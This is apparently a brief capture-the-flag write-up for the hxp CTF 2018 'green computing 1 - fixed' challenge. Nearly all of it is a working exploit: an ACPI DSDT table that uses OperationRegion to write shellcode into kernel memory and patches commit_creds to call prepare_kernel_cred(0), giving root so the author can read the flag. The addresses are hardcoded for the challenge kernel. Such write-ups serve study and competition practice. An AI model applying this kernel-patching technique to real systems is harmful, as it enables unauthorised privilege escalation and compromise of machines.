[https://devcraft.io/2018/12/10/green-computing-hxp-ctf-2018.html#green-computing-1---fixed](https://devcraft.io/2018/12/10/green-computing-hxp-ctf-2018.html#green-computing-1---fixed)

* use an `OperationRegion` to overwrite kernel memory
* patch `commit_creds` to always call `prepare_kernel_cred(0)`
* `cat flag`

```haskell
DefinitionBlock ("", "DSDT", 1, "BOCHS ", "BXPCDSDT", 0x00000002)
{
Method (_INI, 0, NotSerialized) {
// -- 0xFFFFFFFF81241000 space for payload
OperationRegion (PWDN, SystemMemory, 0x1241000, 0x400)
Field (PWDN, AnyAcc, NoLock, Preserve)
{
JMPA, 0x400
}

// -- call prepare_kernel_cred(0)
// -- asm -c 64 -f raw 'push r13; push r12; mov rax, 0xffffffff8104adc0; mov rdi, 0; call rax; mov rdi, rax; mov r13, [0xFFFFFFFF81839040]; push 0xFFFFFFFF8104AC30; ret;' |xxd -i
JMPA = Buffer ()
{
0x41, 0x55, 0x41, 0x54, 0x48, 0xc7, 0xc0, 0xc0, 0xad, 0x04, 0x81, 0x48,
0xc7, 0xc7, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x4c,
0x8b, 0x2c, 0x25, 0x40, 0x90, 0x83, 0x81, 0x68, 0x30, 0xac, 0x04, 0x81,
0xc3
}

// -- 0xFFFFFFFF8104AC24 in commit_creds
OperationRegion (NISC, SystemMemory, 0x104ac24, 96)
Field (NISC, AnyAcc, NoLock, Preserve)
{
NICD, 96
}

// -- asm -c 64 -f raw "mov rax, 0xFFFFFFFF81241000; jmp rax" |xxd -i
NICD = Buffer ()
{
0x48, 0xc7, 0xc0, 0x00, 0x10, 0x24, 0x81, 0xff, 0xe0, 0x90, 0x90, 0x90
}
Return (One)
}
}
```

Original writeup (https://devcraft.io/2018/12/10/green-computing-hxp-ctf-2018.html#green-computing-1---fixed).